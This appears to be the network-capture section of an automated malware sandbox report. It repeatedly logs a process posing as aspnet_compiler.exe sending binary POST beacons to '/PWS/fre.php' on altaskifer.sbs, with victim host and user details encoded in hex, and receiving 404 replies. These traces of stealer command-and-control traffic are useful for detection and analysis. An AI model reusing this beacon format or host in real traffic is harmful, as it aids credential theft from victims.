                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQIc0BlZKlqzETXG8y9kkQBUUQ%2FwbAB%2BjjDe%2B08evMZUWKZ9l4%2FGXMyHNLzG4dRQcXs2WsCKeev4RC7M0b7HQctpmWx37bHLFM226oBJ9DKAxNFdDTnOAQ%2FHY5V8P%2Bsknw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001293881bdb25-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                74192.168.2.649801172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:27.203747034 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:27.327763081 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:27.716696978 CEST595INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:27 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jh2jxEmIRsX6J8aXUF4jae28LXPGGoD2s5NvBoMi2XYNkbUZ8UZdNR7aq95z5QUnZ4cm6NKTzIx31BqNPDoTeaRgWUUib5O7awkX3g0V5ldgXd58fCPpdGFqqAhJEP0pbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012986e288dba-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                75192.168.2.649802172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:27.986411095 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:28.110934019 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:28.497347116 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:28 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tiD3FsR974Fv9vT2itZMy2PMP%2FlPcoDr16YuLU5s6Evr201CXBi5b1BVERG1H%2FDrNUFhaB%2Fca%2FCY3WwxeRN2D%2Bd4ksLcGJAZRUGAYgFLKuXBX%2BYk5OWI5tkLmjM%2Fe8QUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700129d4b5b099e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                76192.168.2.649803172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:28.779877901 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:28.903769016 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:29.282464981 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gV4tNH%2F8w05KMoxlR6UnRJL5PdWziM%2FixS2cDXbj8gpa6G6UJi%2BDOdPyCgsxvTJNr%2Bbfhd7HbRN0kCs6kFeCmvto%2B13SqGWfhxqgNMRnij95SGgFc%2FDfm0rtIt5Epe73xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012a24f16a548-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                77192.168.2.649804172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:29.547585964 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:29.671602964 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:30.060945988 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pB3vkk3DHCWOGxLgUq7X4XT4BlvMyk8ErrHQo5%2F32N4T4EbQEaqMWh4rkZNIAKmang0vD8RFaOSjOdTAZbr2icVkQpvncuYJoqCezvlGCizghOY1N7%2B6YHxxUEXJIzCvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012a71b51daa3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                78192.168.2.649805172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:30.339046955 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:30.463284969 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:30.831743002 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agiLO4zgrf3Y6eqkI0SK2T281GUpuhlXLDCB%2F8DG25P3jLAH1%2BlCdcDZnOqc5d5qcQmG0eKJox%2B5pOcFNcuLTLLHuL8v7F0Q2m1GeWjW83SY2ohl3dQdyYbQQ3%2FcMG0fPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012ac0d37a4c1-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                79192.168.2.649806172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:31.133120060 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:31.258110046 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:31.641822100 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bR%2FqdJxIlx3oW9t%2FUietnG8z0HPiyxseWMi9peiOPEBq3qXEYsojkf6srzaMGpkPpWNUIhZdsVfWoXifRjhgXHB4FU765njyqwoQeoM0d2pc%2FpKPv1TRzz2OglGzdmnFmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012b0fa59a4e0-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                80192.168.2.649807172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:31.907018900 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:32.031678915 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:32.410543919 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:32 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qH7m8j4ebmoyGfDMemOeD78DUImnp6EQtsw7qsk2sYFwDBLGYBVBZexCQqQDj%2BOPc2lhJR%2B5Mi2trqx8KR%2F7J4RUVfIs3xCFBipnHbtvktNPoXyA%2ByYK47c63J3bdM0Qww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012b5dc9a9add-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                81192.168.2.649808172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:32.673177958 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:32.797943115 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:33.166218042 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:33 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTBo15iVik1TXKZthpAse090lGWcnFua%2B4KcUjlhofaUCmQPpyRjH8syy%2FZd8FwfYhbf37Wnq61BSQWGEeJ1fXzQqymj2n%2BB9UQTY%2FHCDLl1%2FXsbOunkObsm%2BJFhrKcwGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012ba9e26a55e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                82192.168.2.649809172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:33.437851906 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:33.561880112 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:33.930989027 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:33 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K7NqMYgptKHO1g6MzCQXpe4H1FfJ%2Faiy775NiBjfbX4F3rIV4AD4Ii1wLZ%2BopoHdv%2FwI3%2Bx2btKvsksCiE4NPyTRQeDhTaYybKLsjJOnUQqDOLEW2k0DyqI%2FrPqgoy74Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012bf6b8e5d10-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                83192.168.2.649810172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:34.204191923 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:34.328361988 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:34.696522951 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:34 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PicQS5CZoBfFqiKTRBYUhxEUn%2BX9zLWkjnFwzvQGztym8D%2FM9reBGzpAbJPDn2JyHcSZ7hlhRfCMKMQpDSh%2FfH%2Bfeqvwu0RyXztdN8xb5LePoRysQmDwnwC%2FAveSM%2BMsXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012c42c7ddad5-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                84192.168.2.649811172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:34.975531101 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:35.099447966 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:35.472255945 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:35 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=roue5Ty1xBVy%2Bl8kOBbrJo%2BDazr5gcbO03DB%2FWcz0dFAOq7UlsnJ4AjuyBSdHMAFpiWxEvl0erU8q1vwb0te4SWtiCgrS0TwsuwIYjpYZ3YcTJuVXM37Wax5T%2B7cHEncaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012c8fa785c6f-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                85192.168.2.649812172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:35.733011007 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:35.856803894 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:36.246402025 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFXi%2Fi11X8H091AhWvOHg%2BlvDZPyO10Kz19pSv3AqxB8m3HSPbec%2BW5%2BQYIxbKZqIiB6GBrIpCso85Qo22A6t2tz1nAL17jzcf0XSsT8SFYi3gRL6duc9vBFKH4PYLLAtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012cdbd5712a7-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                86192.168.2.649814172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:36.516498089 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:36.640357971 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:37.034734964 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2BWeXV%2Fq2U5JM0%2BmNE3k16fRYL5k6zQfT%2F86JvwllMQje6lLFGmaOg8feVyW2BsXR9bl94YkDjc7G3Das0xwFuOxgHH7SrfFVMDmrle1luJUYn8Mwbjll2mJQtHL7QkQoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012d29cf60306-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                87192.168.2.649815172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:37.305241108 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:37.429423094 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:37.815327883 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:37 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
